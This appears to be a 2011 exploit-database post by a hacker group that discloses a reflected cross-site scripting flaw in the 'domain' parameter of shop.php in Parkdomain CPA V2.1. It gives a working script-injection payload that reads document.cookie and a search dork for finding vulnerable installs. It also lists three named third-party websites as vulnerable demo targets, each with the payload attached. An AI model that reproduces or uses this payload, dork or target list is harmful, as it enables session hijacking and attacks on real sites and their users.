ExploitFixes
Parkdomain CPA V2.1 ‎(shop.php)‎ Remote XSS Exploit 2011-04-04 13:54:24
Posted by: HaNniBaL KsA

[./rS]
#####################################################
# #
# _______ _______ | #
# ( ____ )( ____ \ | #
# | ( )|| ( \/ | #
# | (____)|| (_____ | r00t s3cur1ty #
# | __)(_____ ) | t34m #
# | (\ ( ) | | #
# | ) \ \__/\____) | | #
# |/ \__/\_______) | #
# #
#####################################################

[#] Title : Parkdomain CPA V2.1 (shop.php) Remote XSS Exploit!
[#] Version : 2.1
[#] Author : HaNniBaL KsA (HK)
[#] E-mail : [email protected] & [email protected]
[#] Software : Not Available ()
[#] Home : p0c.cc (Proof Of Concepts | P0C Team)
[#] Twitter : twitter.com/r00t_s3cur1ty
[#] Date : 02-04-2011
[#] Dork : Powered By Parkdomain CPA V2.1
[#] Category : Cross-site scriptin (XSS)
[#] Tested on : Fedora 14 & Windows XP sp3 & Windows Vista
[!] Browser test : FireFox 3.6.15 & Chrome 10.0.648.151 & Opera 11.01

-------------------------------------------------------------------------

[+] Vulnerability:
[~] http://site/path/shop.php?domain=XSS


[+] Example:
[~] http://site/path/shop.php?domain="><script>alert(document.cookie);</script>

-------------------------------------------------------------------------

[#] Demo site (3 vuln site) :
[!] http://home.ppc1000.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://wwww.zccbw.com/shop.php?domain="><script>alert(document.cookie);</script>
[!] http://www.offercpa.com/shop.php?domain="><script>alert(document.cookie);</script>

[OoPs! :P]

-------------------------------------------------------------------------

[-] Greetz 2 : Ejram Hacker ; SiLvEr.47 (Dr.SiLvEr) ; Sn!pEr.S!Te ; Abo z7z7 ; ViRuS KsA ; MooT Hacker ; NoQRQR ; Dr.KroOoZ ; Mr.DH ; ...All In MsN!